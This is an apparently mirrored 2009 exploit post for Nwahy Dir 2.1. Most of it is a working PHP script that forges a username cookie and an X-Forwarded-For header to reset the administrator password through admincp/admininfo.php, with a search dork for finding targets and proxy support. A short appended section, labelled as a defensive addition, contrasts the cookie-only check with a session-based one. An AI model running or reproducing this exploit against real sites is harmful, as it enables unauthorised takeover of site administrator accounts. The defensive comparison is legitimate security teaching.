Nwahy Dir 2.1 Arbitrary Change Admin Password Exploit
Source: recru1t[@]ymail.com  Author: rEcruit  Published: 2009-07-10

<?

 /*

   [ Nwahy Dir v2.1 Change Admin Password Exploit ]        
   
  [-] Author        : rEcruit
  [-] Mail            : recru1t[@]ymail.com
  [-] Download   : http://nwahy.com/showdownload-3105.html
  
  [-] Vuln in  ./admincp/admininfo.php
  
   [code]
   
   $u = addslashes($_COOKIE['username']);
   $query = mysql_query ("SELECT * FROM `dlil_admin` WHERE username='$u' AND adminoruser='0'") or die ("Query failed");
   $counts = mysql_num_rows($query);
   if($counts == 0){
   echo "<div align='center'>......................</div>";
   }else{
    
   [/code]
   
  [-] Works On :
  
   1. Nwahy Articles v1
    
   2. Nwahy scripts v1

   3. Nwahy book v1
   
  [-] Note : Path to Control Panel   "/admincp/" .

 */

 error_reporting(0);
 ini_set("max_execution_time",0);
 ini_set("default_socket_timeout",5);


 function Usage()
 {
   print "\n\n";
   print "/------------------------------------------------------------\\\n";
   print "|        Nwahy Dir v2.1 Change Admin Password Exploit        |\n";
   print "\------------------------------------------------------------/\n";
   print "| [-] Author : rEcruit                                       |\n";
   print "| [-] Mail   : recru1t@ymail.com                             |\n";
   print "| [-] Greetz : RAGE SCREAM  , SAUDI L0rD , Fantastic Egypt   |\n";
   print "\------------------------------------------------------------/\n";
   print "| [-] Dork     : Nwahy.com 2.1 , inurl:'add-site.html'       |\n";
   print "| [+] Usage    : php Exploit.php HOST PATH Options           |\n";
   print "| [-] HOST     : Target server (ip/hostname)                 |\n";
   print "| [-] PATH     : Path to Nwahy Dir                           |\n";
   print "| [-] Options  :                                             |\n";
   print "|     =>Proxy  :(ex. 0.0.0.0:8080)                           |\n";
   print "\------------------------------------------------------------/\n";
   print "\n\n";

  exit;
 }


 function Send()
 {
  Global $host,$path,$user,$pwd,$proxy;
  
  if(empty($proxy))
  {
   $Connect = @fsockopen($host,"80") or die("[-] Bad Host .");
  }else{
   $proxy  = explode(":",$proxy);
   $Connect = @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy .");
  }
  
   $Payload = "username={$user}&password={$pwd}";
   $Packet  .= "POST {$path}/admincp/admininfo.php?action=edit HTTP/1.1 \r\n";
   $Packet  .= "Host: {$host}\r\n";
   $Packet  .= "Cookie: username={$user}\r\n";
   $Packet  .= "X-Forwarded-For: 127.0.0.1\r\n";
   $Packet  .= "Content-Type: application/x-www-form-urlencoded\r\n";
   $Packet  .= "Content-Length: ".(strlen($Payload))."\r\n";
   $Packet  .= "Connection: close\r\n\r\n";
   $Packet  .= $Payload;

    fputs($Connect,$Packet);

    while(!feof($Connect))
    $Response .= @fgets($Connect,2048);

    fclose($Connect);
  
  return $Response;
 }
 
 
 function Login()
 {
  $Response = @Send();

   if(eregi("refresh",$Response))
   {
    $msg = "[-] Password changed .\n";
   }
   elseif(eregi("<div align='center'>",$Response))
   {
    $msg = "[-] Bad username .\n";
   }
   else
   {
    $msg = "[-] Exploit failed .\n";
   }

  return $msg;
 }

 

 if ($argc < 3) Usage();

 $host = $argv[1];
 $path = $argv[2];;
 $proxy = $argv[3];

 
  Print "\r\n[-] Connecting to {$host} .... \r\n";
  
  while(1)
  {
   Print "[-] Username: ";

   if($user = str_replace (" ", "%20", trim(fgets(STDIN))))
   {
    Print "[-] New password: ";

    if($pwd = str_replace (" ", "%20", trim(fgets(STDIN))))
    {
     Print Login();
     exit;
    }


   }


  } //end while

?>
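
Defensive note (an added example, not part of the original post and not Nwahy code): the check quoted in the exploit header takes the admin identity from the client-supplied `username` cookie, so the server never verifies that a login happened. The PHP below puts that cookie-only check beside a session-based one and a password change that requires the current password. The SQLite in-memory table, the `id` column, the `admin_id` session key and the sample credentials are assumptions made for illustration.

```php
<?php
// Added example, not Nwahy code. Table and column names follow the snippet quoted in
// the exploit header; the `id` column and session key 'admin_id' are assumptions.
$db = new PDO('sqlite::memory:');   // constructed stand-in for the real database
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE dlil_admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT, adminoruser TEXT)");
$db->prepare("INSERT INTO dlil_admin (username, password, adminoruser) VALUES (?, ?, '0')")
   ->execute(['admin', password_hash('constructed-sample-pw', PASSWORD_DEFAULT)]);

// Same logic as the quoted check: identity is read from a client-controlled cookie.
function admin_check_cookie_only(PDO $db, array $cookie): bool
{
    $stmt = $db->prepare("SELECT COUNT(*) FROM dlil_admin WHERE username = ? AND adminoruser = '0'");
    $stmt->execute([$cookie['username'] ?? '']);
    return (int) $stmt->fetchColumn() > 0;
}

// Hardened: identity comes from server-side session state set only after login.
function admin_check_session(PDO $db, array $session): bool
{
    if (empty($session['admin_id'])) {
        return false;
    }
    $stmt = $db->prepare("SELECT COUNT(*) FROM dlil_admin WHERE id = ? AND adminoruser = '0'");
    $stmt->execute([$session['admin_id']]);
    return (int) $stmt->fetchColumn() > 0;
}

// Changing the password also requires proof of the current one.
function change_password(PDO $db, array $session, string $current, string $new): bool
{
    if (!admin_check_session($db, $session)) {
        return false;
    }
    $stmt = $db->prepare("SELECT password FROM dlil_admin WHERE id = ?");
    $stmt->execute([$session['admin_id']]);
    if (!password_verify($current, (string) $stmt->fetchColumn())) {
        return false;
    }
    $upd = $db->prepare("UPDATE dlil_admin SET password = ? WHERE id = ?");
    return $upd->execute([password_hash($new, PASSWORD_DEFAULT), $session['admin_id']]);
}

$forged = ['username' => 'admin'];   // constructed request: cookie only, no login
var_dump(admin_check_cookie_only($db, $forged));
var_dump(admin_check_session($db, []));
var_dump(change_password($db, ['admin_id' => 1], 'wrong-guess', 'new-pw'));
var_dump(change_password($db, ['admin_id' => 1], 'constructed-sample-pw', 'new-pw'));
```

The cookie-only check accepts the constructed request although no login took place, while the session check rejects a request that carries no server-side session. In a real deployment `$session` would be `$_SESSION`, populated by the login handler after `password_verify()` succeeds.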


 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved